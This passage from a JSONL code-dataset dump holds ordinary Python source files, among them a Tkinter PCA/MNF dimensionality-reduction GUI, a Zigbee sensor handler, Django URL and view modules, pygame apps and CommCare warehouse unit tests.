Fraction\")\n t3.geometry(\"600x180\")\n t3.resizable(width=False,height=False)\n v1=StringVar()\n Label(t3,textvariable=v1,font = ('Times New Roman',10)).pack()\n v1.set(\"The bands in a hyperspectral dataset have differing noise levels (S/N). It may be desirable to \")\n v2=StringVar()\n Label(t3,textvariable=v2,font = ('Times New Roman',10)).pack()\n v2.set(\"filter or remove those bands that contribute most to noise. When the bands of a hyperspectral \")\n v3=StringVar()\n Label(t3,textvariable=v3,font = ('Times New Roman',10)).pack()\n v3.set(\"dataset have differing amounts of noise, a standard principal components (PC) transform will not\")\n v4=StringVar()\n Label(t3,textvariable=v4,font = ('Times New Roman',10)).pack()\n v4.set(\"produce components with a steadily increasing noise level. This makes it difficult to select a \")\n v5=StringVar()\n Label(t3,textvariable=v5,font = ('Times New Roman',10)).pack()\n v5.set(\"cutoff point. To achieve a components dataset that does have increasing noise (decreasing S/N), a\")\n v6=StringVar()\n Label(t3,textvariable=v6,font = ('Times New Roman',10)).pack()\n v6.set(\"modified PC transform, termed the Minimum Noise Fraction (MNF) has been developed (Green et \")\n v7=StringVar()\n Label(t3,textvariable=v7,font = ('Times New Roman',10)).pack()\n v7.set(\"al. 1988, Lee et al. 1990). 
The MNF transform produces a set of principal component images \")\n v8=StringVar()\n Label(t3,textvariable=v8,font = ('Times New Roman',10)).pack()\n v8.set(\"ordered in terms of decreasing signal quality.\")\ndef abtxt():\n t3=Toplevel(root)\n t3.title(\"About Software\")\n t3.geometry(\"450x220\")\n t3.resizable(width=False,height=False)\n v = StringVar()\n Label(t3, textvariable=v,font = ('Times New Roman', 12, 'bold')).place(x=10,y=0)\n v.set(\"Prepared By: \")\n v1 = StringVar()\n Label(t3, textvariable=v1,font = ('Times New Roman', 12, 'bold')).place(x=300,y=0)\n v1.set(\"Guided By: \")\n v2 = StringVar()\n Label(t3, textvariable=v2,font = ('Times New Roman', 12, 'bold'),fg='red').place(x=10,y=175)\n v2.set(\"Manoj Kumar\")\n v3= StringVar()\n Label(t3, textvariable=v3,font = ('Times New Roman', 12, 'bold'),fg='red').place(x=10,y=195)\n v3.set(\"ECE, NIT Hamirpur\")\n v4 = StringVar()\n Label(t3, textvariable=v4,font = ('Times New Roman', 12, 'bold'),fg='red').place(x=300,y=175)\n v4.set(\"Vinay Kumar\")\n v5 = StringVar()\n Label(t3, textvariable=v5,font = ('Times New Roman', 12, 'bold'),fg='red').place(x=300,y=195)\n v5.set(\"Scientist/Engineer\")\n img = tk.PhotoImage(file=\"manoj.png\")\n panel = tk.Label(t3,image = img)\n panel.place(x=10,y=40)\n img1 = tk.PhotoImage(file=\"Vinay-kumar.png\")\n panel1 = tk.Label(t3,image = img1,width=100,height=130)\n panel1.place(x=300,y=40)\n panel.mainloop()\n panel1.mainloop()\ndef pcaf():\n name= askopenfilename() \n global mylib\n mylib = envi.open(name)\n nbands = mylib.shape[-1]\n yes(nbands)\ndef mnff():\n name= askopenfilename() \n global mylib\n mylib = envi.open(name)\n nbands = mylib.shape[-1]\n yes2(nbands) \ndef open_image():\n t4=Toplevel(root)\n global gt \n name = askopenfilename()\n gt = envi.open(name)\n nbands = gt.shape[-1]\n scrollbar = Scrollbar()\n global lb\n lb = tk.Listbox(t4,yscrollcommand=scrollbar.set)\n scrollbar.config(command=lb.yview)\n scrollbar.pack(side=RIGHT, fill=Y)\n global sf\n sf=dict()\n for l in range(nbands):\n s=\"Band \"+str(l+1)\n sf[s]=l\n lb.insert(tk.END,s) \n lb.pack(side=\"top\", fill=\"both\", expand=True) \n lb.bind(\"<<ListboxSelect>>\",OnDouble) \nroot=tk.Tk()\nroot.geometry(\"400x300\")\nroot.resizable(width=False, height=False)\nroot.title(\"Data Dimensionality Reduction\")\nmenubar=Menu(root)\nfilemenu=Menu(menubar,tearoff=0)\nfilemenu.add_command(label=\"Image\",command=open_image)\nfilemenu.add_separator()\nfilemenu.add_command(label=\"Exit\",command=root.destroy)\nmenubar.add_cascade(label=\"File\",menu=filemenu)\nDDRmenu=Menu(menubar,tearoff=0)\nPCA=Menu(DDRmenu,tearoff=0)\nKernalPCA=Menu(DDRmenu,tearoff=0)\nMNF=Menu(DDRmenu,tearoff=0)\nICA=Menu(DDRmenu,tearoff=0)\nLDA=Menu(DDRmenu,tearoff=0)\nmenubar.add_cascade(label=\"DDR\",menu=DDRmenu)\nDDRmenu.add_command(label=\"PCA\",command=pcaf)\nDDRmenu.add_command(label=\"MNF\",command=mnff)\nhelpmenu=Menu(menubar,tearoff=0)\nhelpmenu.add_command(label=\"DDR\",command=ddrtxt)\nhelpmenu.add_command(label=\"PCA\",command=pcatxt)\nhelpmenu.add_command(label=\"MNF\",command=mnftxt)\nmenubar.add_cascade(label=\"Help\",menu=helpmenu)\nabout=Menu(menubar,tearoff=0)\nabout.add_command(label=\"About Software\",command=abtxt)\nmenubar.add_cascade(label=\"About\",menu=about)\nroot.config(menu=menubar)\nroot.mainloop()\n\n\n\n\n","sub_path":"Data Dimensionality Reduction.py","file_name":"Data Dimensionality Reduction.py","file_ext":"py","file_size_in_byte":17626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
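The PCA help text in the record above describes the essential computation: form the covariance matrix of the data, take its eigenvectors, and project onto the ones with the largest eigenvalues. A minimal numpy sketch of that idea (the array shape and values are hypothetical; the program itself delegates this step to spectral's principal_components() and pc.reduce()):

import numpy as np

def pca_reduce(X, num_components):
    # Rows are samples (pixels), columns are variables (spectral bands).
    X_centered = X - X.mean(axis=0)
    # Eigendecomposition of the band covariance matrix.
    eigenvalues, eigenvectors = np.linalg.eigh(np.cov(X_centered, rowvar=False))
    # eigh returns eigenvalues in ascending order; keep the largest ones.
    order = np.argsort(eigenvalues)[::-1][:num_components]
    # Project the centered data onto the selected principal components.
    return X_centered @ eigenvectors[:, order]

# Example: 1000 pixels with 50 bands reduced to 3 components.
print(pca_reduce(np.random.rand(1000, 50), 3).shape)  # (1000, 3)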
+{"seq_id":"337856117","text":"#import RPi.GPIO as GPIO\r\n#import Adafruit_DHT\r\nfrom Crypto.Hash import MD5\r\nimport serial\r\nimport binascii\r\nimport time\r\nimport zb_HandshakeHub\r\n#import clientEgress\r\n#import ReceiveV2\r\n\r\nzb = zb_HandshakeHub.zb\r\n\r\ndef Push(payload):\r\n\t#GPIO.setmode(GPIO.BCM)\r\n\t#GPIO.setup(4, GPIO.OUT)\r\n\r\n\tif(payload.decode() == 'lumos'):\r\n\t\tprint('DEBUG: light is on')\r\n\t#\tGPIO.output(4, 1)\r\n\telse:\r\n\t\tprint('DEBUG: light is off')\r\n\t#\tGPIO.output(4, 0)\r\n\tprint(\"PUSH RECEIVED: PAYLOAD IS \", payload)\r\n\r\n\r\n\r\n# def PullReq(parsePacket):\r\n\r\n# \thum, temp = 22,45\r\n# \thum = int(hum)\r\n# \ttemp = int(temp)\r\n# \tpacket = clientEgress.clientEncapsulate(b'\\x02',parsePacket['src'],parsePacket['dest'],temp,ReceiveV2.secret)\r\n# \tpublish(packet)\r\n\r\ndef PullRep(payload):\r\n\r\n\tprint(\"pull replied: \",int.from_bytes(payload,byteorder='big'))\r\n\r\ndef PullReq(parsePacket, secret, zb):\r\n\t#hum, temp = Adafruit_DHT.read_retry(11, 4)\r\n\thum ,temp = 22,45\r\n\thum = int(hum)\r\n\ttemp = int(temp)\r\n\tpullreq = parsePacket['Payload']\r\n\tpullreq = (pullreq.decode()).lower()\r\n\tif (pullreq == 'temp'):\r\n\t\tpullrep = bytes([temp])\r\n\t\tprint(\"MY TEMP IS: \", temp)\r\n\telif (pullreq == 'humidity'):\r\n\t\tpullrep = bytes([hum])\r\n\t\tprint(\"MY HUMIDITY IS: \", hum)\r\n\theader = b'\\x01\\x02'+parsePacket['dst'] +parsePacket['src'] + pullrep\r\n\ttemp = header + secret\r\n\tht = MD5.new()\r\n\tht.update(temp)\r\n\tfinal = ht.hexdigest()\r\n\tdata = header + bytes.fromhex(final)\r\n\teol = b'\\r\\n'\r\n\tprint(\"sending(len:\",len(binascii.hexlify(data)),\") :\",binascii.hexlify(data))\r\n\t#time.sleep(4)\t\r\n\tzb.write(data+eol)\r\n\r\n#def PullRep(payload):\r\n\r\n#def DataSend(payload):\r\n\r\n#def DataCollect(payload):\r\n\r\n\r\ndef service(parsePacket, secret):\r\n\tglobal zb\r\n\tservType = parsePacket['Type']\r\n\tpayload = parsePacket['Payload']\r\n\r\n\tif(servType == b'\\x00'):\r\n\t\tPush(payload)\r\n\telif(servType == b'\\x01'):\r\n\t\tPullReq(parsePacket, secret, zb)\r\n\telif(servType == b'\\x02'):\r\n\t\tPullRep(payload)\r\n\telif(servType == b'\\x03'):\r\n\t\tDataSend(payload)\r\n\telif(servType == b'\\x04'):\r\n\t\tDataCollect(payload)\r\n\r\n\treturn None\r\n","sub_path":"zb/clientServ.py","file_name":"clientServ.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"451542477","text":"import pygame\r\nimport bluetooth\r\n\r\nSCREENWIDTH = 800\r\nSCREENHEIGHT = 480\r\n\r\nclass bluetoothPiC:\r\n green = (0, 255, 0)\r\n blue = (0, 0, 128)\r\n\r\n def __init__(self, sizeH, sizeW):\r\n self.sizeH = sizeH\r\n self.sizeW = sizeW\r\n\r\n def printSearchDevice(self, screen, posH, posW, width, height):\r\n font = pygame.font.Font('Resources/fonts/OpenSans-Regular.ttf', 10)\r\n text = font.render('GeeksForGeeks\\n\\ntravaillll', True, self.green, self.blue)\r\n textRect = text.get_rect()\r\n textRect.center = (posW, posH)\r\n screen.blit(text, textRect)\r\n\"\"\"\r\nnearby_devices = bluetooth.discover_devices(lookup_names=True)\r\nprint(\"found %d devices\" % len(nearby_devices))\r\n\r\nfor addr, name in nearby_devices:\r\n print(\" %s - %s\" % (addr, name))\r\n\"\"\"\r\n","sub_path":"PiCar/bluetoothPiC.py","file_name":"bluetoothPiC.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 
+{"seq_id":"157052297","text":"\"\"\"ModelServer URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nfrom rest_framework.schemas import get_schema_view\nfrom rest_framework.documentation import include_docs_urls\n\nAPI_TITLE = 'MR Interior Design Server API'\nAPI_DESCRIPTION = 'A Web API for creating and viewing cloud database.'\nschema_view = get_schema_view(title=API_TITLE)\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^accounts/', include('registration.backends.simple.urls')),\n url(r'^schema/$', schema_view),\n url(r'^docs/', include_docs_urls(title=API_TITLE, description=API_DESCRIPTION,\n authentication_classes=[], permission_classes=[],\n ),\n ),\n url(r'^category/', include('categories.urls')),\n url(r'^asset/', include('assets.urls')),\n url(r'^descriptor/', include('descriptors.urls')),\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"ModelServer/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"596220459","text":"#!/usr/bin/env python\n\nfrom view_matrix import ViewMatrix\nfrom view_schedule import ViewSchedule\n\nimport pygame\nimport threading\nimport time\n\nWIDTH=800\nHEIGHT=480\n\nclass Application:\n def __init__(self):\n self.models = []\n self.views = []\n\n matrix = ViewMatrix()\n self.models.append(matrix)\n self.views.append(matrix)\n\n self.views.append(ViewSchedule())\n\n self.queue_draw = True\n\n def run(self):\n # Initialize the screen\n pygame.init()\n pygame.mouse.set_visible(False)\n screen = pygame.display.set_mode((WIDTH, HEIGHT))\n\n while True:\n # Monitor for quit events.\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n return\n\n # Allow models to update.\n for model in self.models:\n if model.update():\n self.queue_draw = True\n\n # Trigger a render if any models changed.\n if self.queue_draw:\n self.queue_draw = False\n self.render(screen)\n else:\n time.sleep(0.1)\n\n def render(self, screen):\n surface = pygame.Surface(screen.get_size())\n surface = surface.convert()\n surface.fill((0, 0, 0))\n\n for view in self.views:\n view.render(surface)\n\n screen.blit(surface, (0, 0))\n pygame.display.flip()\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"218877871","text":"from easydict import EasyDict as edict\nimport os\n\n__C = edict()\ncfg = __C\n\nreal_path = os.path.dirname(os.path.realpath(__file__))\n__C.NCS_GRAPH = os.path.join(real_path, \"graph\")\n__C.MODEL_INPUT_SIZE = (448,448)\n__C.CLASSES = [\"aeroplane\", \"bicycle\", \"bird\", \"boat\", \"bottle\", \"bus\", \"car\", \"cat\", 
\"chair\", \"cow\", \"diningtable\", \"dog\", \"horse\", \"motorbike\", \"person\", \"pottedplant\", \"sheep\", \"sofa\", \"train\",\"tvmonitor\"]\n__C.BOXES_FILTERING_THRESHOLD = 0.2\n__C.IOU_FILTERING_THRESHOLD = 0.5\n__C.NUM_CLASSES = len(__C.CLASSES)\n__C.NUM_BOXES = 2\n__C.GRID_SIZE = 7\n","sub_path":"yolo_config.py","file_name":"yolo_config.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"631073220","text":"import os\nimport logging\n\nimport boto3\n\ndynamodb = boto3.resource('dynamodb')\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n\nclass User():\n __columns = {'id', 'name', 'timing', 'percent',\n 'area', 'active', 'talk_status', 'message'}\n\n @classmethod\n def find(cls, user_id):\n table = dynamodb.Table(os.environ.get('TABLE_NAME'))\n res = table.get_item(Key={'id': user_id})\n if 'Item' in res:\n if res['Item'].keys() == cls.__columns:\n return User(id=res['Item']['id'],\n name=res['Item']['name'],\n timing=res['Item']['timing'],\n percent=res['Item']['percent'],\n area=res['Item']['area'],\n active=res['Item']['active'],\n talk_status=res['Item']['talk_status'],\n message=res['Item']['message'])\n else:\n raise ValueError\n else:\n return None\n\n def __init__(self, id, name, timing='06:15', percent=40, area='東京',\n active=True, setting_status='Wait', talk_status='Wait',\n message='none'):\n self.id = id\n self.name = name\n self.timing = timing\n self.percent = percent\n self.area = area\n self.active = active\n self.talk_status = talk_status\n self.message = message\n\n def save(self):\n table = dynamodb.Table(os.environ.get('TABLE_NAME'))\n item = {'id': self.id,\n 'name': self.name,\n 'timing': self.timing,\n 'percent': self.percent,\n 'area': self.area,\n 'active': self.active,\n 'talk_status': self.talk_status,\n 'message': self.message}\n table.put_item(Item=item)\n","sub_path":"functions/bot/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"290711440","text":"#python 2.7.15\nimport math\n\nx = 26977\n\n#New Class\nclass MathExec:\n def __init__(var1,num1):\n var1.num1 = math.sqrt(num1)\n var1.num2 = num1\n \n def showSqrt(var1):\n print(\"The squareroot of the number is: \" + str(var1.num1))\n\n def isOddorEven(var1):\n if var1.num2%2 == 0:\n print(str(var1.num2) + \" is Even.\")\n else:\n print(str(var1.num2) +\" is Odd.\")\n\n#New Functions\ndef extractSQR(num):\n return math.sqrt(num)\n\ndef OddOrEven(num):\n mod = num%2\n if mod==0:\n print(str(num) + \" is Even\")\n else:\n print(str(num) + \"is Odd\")\n\n#Exec Main Body\n\n # Executing using Call Function\nprint(\"The squareroot of the number is: \" + str(extractSQR(x)))\nOddOrEven(x)\n\nprint(\"----------------------------------\")\n\n # Executing using Instantation\nz = MathExec(x)\nz.showSqrt()\nz.isOddorEven()","sub_path":"pyByCallingFunction.py","file_name":"pyByCallingFunction.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"608203822","text":"# encoding: utf-8\nimport os\nfrom os.path import *\n\n# ---------- Feel Free To Change This Block -----------------\n\nCITY_CH2PY = {\n\t'无锡': 'wuxi',\n\t'武汉': 'wuhan',\n\t'北京': '',\n\t'成都': 'cd',\n\t'大连': 'dl',\n\t'东莞': 'dg',\n\t'佛山': 'fs',\n\t'福州': 'fz',\n\t'广州': 'gz',\n\t'杭州': 'hz',\n\t'合肥': 'hf',\n\t'南昌': 'nc',\n\t'南京': 
'nanjing',\n\t'宁波': 'nb',\n\t'青岛': 'qd',\n \t'厦门': 'xm',\n\t'上海': 'sh',\n\t'深圳': 'sz',\n\t'沈阳': 'sy',\n\t'苏州': 'suzhou',\n\t'天津': 'tj',\n\t'西安': 'xian',\n\t'长春': 'changchun',\n\t'长沙': 'cs',\n\t'郑州': 'zz',\n\t'重庆': 'cq'\n}\n\nYEAR = 2016\nMONTH = 7\n\nFIELDS = [\n\t'开盘时间',\n\t'项目名称',\n\t'建筑面积',\n\t'开发商',\n\t'物业管理公司'\n]\n\nTIMEOUT = 20\n\n\n# ---------- Try not to touch this -----------------\n\n# PATH\nSRC_DIR = dirname(abspath(__file__))\nPRJ_DIR = dirname(SRC_DIR)\nCACHE_DIR = join(PRJ_DIR, 'cache')\nRESULT_DIR = join(PRJ_DIR, 'result')\n\n\ndef create_dir(dirpath):\n\tif not isdir(dirpath):\n\t\tos.mkdir(dirpath)\n\t\t\ncreate_dir(CACHE_DIR)\ncreate_dir(RESULT_DIR)","sub_path":"src/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"36190944","text":"from __future__ import absolute_import\nfrom __future__ import unicode_literals\nfrom datetime import datetime, timedelta\n\nfrom corehq.apps.users.util import SYSTEM_USER_ID, DEMO_USER_ID\nfrom corehq.apps.commtrack.const import COMMTRACK_USERNAME\nfrom corehq.pillows.utils import (\n SYSTEM_USER_TYPE,\n DEMO_USER_TYPE,\n COMMCARE_SUPPLY_USER_TYPE,\n WEB_USER_TYPE,\n MOBILE_USER_TYPE,\n)\nfrom corehq.warehouse.models import ApplicationDim\nfrom corehq.warehouse.models import ApplicationStagingTable\nfrom corehq.warehouse.tests.utils import (\n create_user_staging_record,\n create_location_records_from_tree,\n create_location_staging_record,\n create_group_staging_record,\n create_batch,\n BaseWarehouseTestCase, create_application_staging_record)\nfrom corehq.warehouse.models import (\n Batch,\n UserStagingTable,\n UserDim,\n GroupStagingTable,\n GroupDim,\n UserGroupDim,\n LocationDim,\n LocationStagingTable,\n DomainMembershipDim\n)\n\n\ndef teardown_module():\n Batch.objects.all().delete()\n\n\nclass TestUserDim(BaseWarehouseTestCase):\n\n domain = 'user-dim-test'\n slug = 'user_dim'\n\n @classmethod\n def setUpClass(cls):\n super(TestUserDim, cls).setUpClass()\n cls.batch = create_batch(cls.slug)\n cls.records = [\n create_user_staging_record(\n cls.domain,\n user_id=SYSTEM_USER_ID,\n username='system_bob',\n batch_id=cls.batch.id\n ),\n create_user_staging_record(\n cls.domain,\n user_id=DEMO_USER_ID,\n username='demo_sally',\n batch_id=cls.batch.id\n ),\n create_user_staging_record(\n cls.domain,\n user_id=COMMTRACK_USERNAME,\n username='commtrack_billy',\n batch_id=cls.batch.id\n ),\n create_user_staging_record(\n None,\n user_id='beeboobop',\n username='web',\n doc_type='WebUser',\n batch_id=cls.batch.id\n ),\n create_user_staging_record(\n cls.domain,\n user_id='greengoblin',\n username='mobile',\n batch_id=cls.batch.id\n ),\n ]\n\n @classmethod\n def tearDownClass(cls):\n for record in cls.records:\n record.delete()\n UserDim.clear_records()\n UserStagingTable.clear_records()\n super(TestUserDim, cls).tearDownClass()\n\n def test_user_types(self):\n UserDim.commit(self.batch)\n\n self.assertEqual(UserDim.objects.count(), 5)\n self.assertEqual(\n UserDim.objects.filter(user_type=SYSTEM_USER_TYPE).first().user_id,\n SYSTEM_USER_ID,\n )\n self.assertEqual(\n UserDim.objects.filter(user_type=DEMO_USER_TYPE).first().user_id,\n DEMO_USER_ID,\n )\n self.assertEqual(\n UserDim.objects.filter(user_type=COMMCARE_SUPPLY_USER_TYPE).first().user_id,\n COMMTRACK_USERNAME,\n )\n self.assertEqual(\n UserDim.objects.filter(user_type=MOBILE_USER_TYPE).first().user_id,\n 'greengoblin',\n )\n self.assertEqual(\n 
UserDim.objects.filter(user_type=WEB_USER_TYPE).first().user_id,\n 'beeboobop',\n )\n\n\nclass TestDomainMembershipDim(BaseWarehouseTestCase):\n slug = DomainMembershipDim.slug\n\n @classmethod\n def setUpClass(cls):\n super(TestDomainMembershipDim, cls).setUpClass()\n cls.batch = create_batch(cls.slug)\n cls.bootstrap_user_staging()\n\n @classmethod\n def bootstrap_user_staging(cls):\n create_user_staging_record(\n domain='test1',\n user_id='u1',\n username='mobile1',\n doc_type='CommCareUser',\n batch_id=cls.batch.id,\n )\n create_user_staging_record(\n domain='test1',\n user_id='u2',\n username='mobile2',\n doc_type='CommCareUser',\n batch_id=cls.batch.id,\n )\n create_user_staging_record(\n domain=None,\n username='mobile1',\n user_id='u3',\n doc_type='WebUser',\n batch_id=cls.batch.id,\n domain_memberships=[\n {'domain': 'test1', 'is_admin': True},\n {'domain': 'test2', 'is_admin': False},\n ]\n )\n UserDim.commit(cls.batch)\n\n @classmethod\n def tearDownClass(cls):\n DomainMembershipDim.clear_records()\n UserDim.clear_records()\n UserStagingTable.clear_records()\n super(TestDomainMembershipDim, cls).tearDownClass()\n\n def test_insert_and_update(self):\n DomainMembershipDim.commit(self.batch)\n # should create 4 domain membership columns\n self.assertEqual(\n DomainMembershipDim.objects.count(), 4\n )\n # 'u3' user should have 2 membership columns for each of the domain\n dim_id_of_user3 = UserDim.objects.filter(user_id='u3')[0].id\n self.assertEqual(\n DomainMembershipDim.objects.filter(user_dim_id=dim_id_of_user3).count(),\n 2\n )\n\n ## test removing a domain membership\n # clear and add new staging record to remove a membership of 2\n UserStagingTable.clear_records()\n create_user_staging_record(\n domain=None,\n username='mobile1',\n user_id='u3',\n doc_type='WebUser',\n batch_id=self.batch.id,\n domain_memberships=[\n {'domain': 'test1', 'is_admin': True},\n ]\n )\n DomainMembershipDim.commit(self.batch)\n # should create 3 domain membership columns instead of 4\n self.assertEqual(\n DomainMembershipDim.objects.count(), 3\n )\n # u3 user should have only 1 domain-membership\n dim_id_of_user3 = UserDim.objects.filter(user_id='u3')[0].id\n self.assertEqual(\n DomainMembershipDim.objects.filter(user_dim_id=dim_id_of_user3).count(),\n 1\n )\n\n\nclass TestUserGroupDim(BaseWarehouseTestCase):\n\n domain = 'user-group-dim-test'\n slug = 'user_group_dim'\n\n @classmethod\n def setUpClass(cls):\n super(TestUserGroupDim, cls).setUpClass()\n cls.batch = create_batch(cls.slug)\n cls.blue_dog = create_user_staging_record(cls.domain,\n username='blue-dog',\n batch_id=cls.batch.id)\n cls.black_dog = create_user_staging_record(cls.domain,\n username='black-dog',\n batch_id=cls.batch.id)\n cls.yellow_cat = create_user_staging_record(cls.domain,\n username='yellow-cat',\n batch_id=cls.batch.id)\n\n @classmethod\n def tearDownClass(cls):\n GroupStagingTable.clear_records()\n UserStagingTable.clear_records()\n GroupDim.clear_records()\n UserDim.clear_records()\n UserGroupDim.clear_records()\n super(TestUserGroupDim, cls).tearDownClass()\n\n def test_basic_user_group_insert(self):\n UserDim.commit(self.batch)\n self.assertEqual(UserDim.objects.count(), 3)\n\n # Setup group records to have multiple users\n dogs = create_group_staging_record(\n self.domain,\n 'dogs',\n user_ids=[self.blue_dog.user_id, self.black_dog.user_id],\n batch_id=self.batch.id\n )\n create_group_staging_record(\n self.domain,\n 'cats',\n user_ids=[self.yellow_cat.user_id],\n batch_id=self.batch.id\n )\n 
GroupDim.commit(self.batch)\n self.assertEqual(GroupDim.objects.count(), 2)\n\n UserGroupDim.commit(self.batch)\n self.assertEqual(UserGroupDim.objects.count(), 3)\n dog_relations = UserGroupDim.objects.filter(group_dim=GroupDim.objects.get(group_id=dogs.group_id))\n self.assertEqual(\n dog_relations.count(),\n 2,\n )\n self.assertEqual(\n set(dog_relations.values_list('user_dim_id', flat=True)),\n set(UserDim.objects.filter(\n user_id__in=[self.blue_dog.user_id, self.black_dog.user_id]\n ).values_list('id', flat=True)),\n )\n\n\nclass TestLocationDim(BaseWarehouseTestCase):\n\n domain = 'location-dim-test'\n slug = 'location_dim'\n\n @classmethod\n def setUpClass(cls):\n super(TestLocationDim, cls).setUpClass()\n cls.batch = create_batch(cls.slug)\n\n def tearDown(self):\n LocationStagingTable.clear_records()\n LocationDim.clear_records()\n super(TestLocationDim, self).tearDown()\n\n def test_location_dim(self):\n tree = {\n ('Illinois', 'state'): {\n ('Naperville', 'city'): {\n ('Home', 'home'): {}\n },\n ('Chicago', 'city'): {},\n }\n }\n create_location_records_from_tree(self.domain, tree, self.batch.id)\n\n self.assertEqual(LocationStagingTable.objects.count(), 4)\n\n LocationDim.commit(self.batch)\n self.assertEqual(LocationDim.objects.count(), 4)\n home_location = LocationDim.objects.filter(name='Home').first()\n\n self.assertEqual(\n home_location.location_level_0,\n LocationDim.objects.filter(name='Illinois').first().sql_location_id,\n )\n self.assertEqual(\n home_location.location_level_1,\n LocationDim.objects.filter(name='Naperville').first().sql_location_id,\n )\n self.assertEqual(home_location.location_level_2, home_location.sql_location_id)\n self.assertEqual(home_location.location_level_3, None)\n self.assertEqual(home_location.location_level_4, None)\n self.assertEqual(home_location.location_level_5, None)\n self.assertEqual(home_location.location_level_6, None)\n self.assertEqual(home_location.location_level_7, None)\n\n self.assertEqual(home_location.level, 2)\n self.assertEqual(home_location.location_type_name, 'home')\n self.assertEqual(home_location.location_type_code, 'home')\n\n root_location = LocationDim.objects.filter(name='Illinois').first()\n self.assertEqual(root_location.location_level_0, root_location.sql_location_id)\n self.assertEqual(root_location.level, 0)\n\n def test_location_dim_update(self):\n tree = {\n ('Illinois', 'state'): {\n ('Naperville', 'city'): {\n ('Home', 'home'): {}\n },\n ('Chicago', 'city'): {},\n }\n }\n create_location_records_from_tree(self.domain, tree, self.batch.id)\n LocationDim.commit(self.batch)\n self.assertEqual(LocationDim.objects.count(), 4)\n\n # Let's add one more location under Naperville to ensure that the dim updates\n # when it's not a root node\n LocationStagingTable.clear_records()\n home_location = LocationDim.objects.filter(name='Home').first()\n city_location = LocationDim.objects.filter(name='Naperville').first()\n create_location_staging_record(\n self.domain,\n 'Other home',\n sql_location_id=10,\n # Give it the same parent as the Home location\n sql_parent_location_id=city_location.sql_location_id,\n location_type_id=home_location.location_type_id,\n batch_id=self.batch.id\n )\n\n LocationDim.commit(self.batch)\n self.assertEqual(LocationDim.objects.count(), 5)\n\n\nclass TestAppDim(BaseWarehouseTestCase):\n\n domain = 'app-dim-test'\n slug = 'app_dim'\n\n @classmethod\n def setUpClass(cls):\n super(TestAppDim, cls).setUpClass()\n cls.batch = create_batch(cls.slug)\n\n @classmethod\n def 
tearDownClass(cls):\n ApplicationDim.clear_records()\n ApplicationStagingTable.clear_records()\n super(TestAppDim, cls).tearDownClass()\n\n def test_app_dim(self):\n create_application_staging_record(self.domain, 'test-app', batch_id=self.batch.id)\n create_application_staging_record(self.domain, 'test-deleted', doc_type='Application-Deleted', batch_id=self.batch.id)\n ApplicationDim.commit(self.batch)\n self.assertEqual(ApplicationDim.objects.count(), 2)\n test_app = ApplicationDim.objects.get(name='test-app')\n self.assertEqual(test_app.deleted, False)\n deleted_app = ApplicationDim.objects.get(name='test-deleted')\n self.assertEqual(deleted_app.deleted, True)\n","sub_path":"corehq/warehouse/tests/test_dimensions.py","file_name":"test_dimensions.py","file_ext":"py","file_size_in_byte":12816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"35506860","text":"from django.shortcuts import render\r\n\r\nfrom .forms import ContatoForm, LoginForm\r\n\r\n# Create your views here.\r\ndef home(request):\r\n context = {\r\n \"titulo\":\"Outro Título\",\r\n }\r\n return render(request, \"index.html\", context)\r\n\r\ndef contato(request):\r\n context = {}\r\n\r\n if request.POST:\r\n form = ContatoForm(request.POST)\r\n if form.is_valid():\r\n context[\"mensagem\"] = \"Mensagem enviada com sucesso\"\r\n else:\r\n context[\"mensagem\"] = \"Problemas ao enviar a mensagem\"\r\n else:\r\n form = ContatoForm()\r\n #context[\"mensagem\"] = \"Foi um GET\"\r\n\r\n context[\"form\"] = form\r\n return render(request, \"contato.html\", context)\r\n\r\ndef entrar(request):\r\n context = {}\r\n\r\n if request.POST:\r\n form = LoginForm(request.POST)\r\n \r\n if form.is_valid():\r\n context[\"mensagem\"] = \"Login realizado com sucesso\"\r\n else:\r\n context[\"mensagem\"] = \"Erro ao logar\"\r\n else:\r\n form = LoginForm()\r\n #context[\"mensagem\"] = \"Foi um GET\"\r\n\r\n context[\"form\"] = form\r\n return render(request, \"entrar.html\", context)","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"404787606","text":"#Import the libraries\nfrom tkinter import *\nimport tkinter.messagebox as box\n\n#Create the window\nwindow = 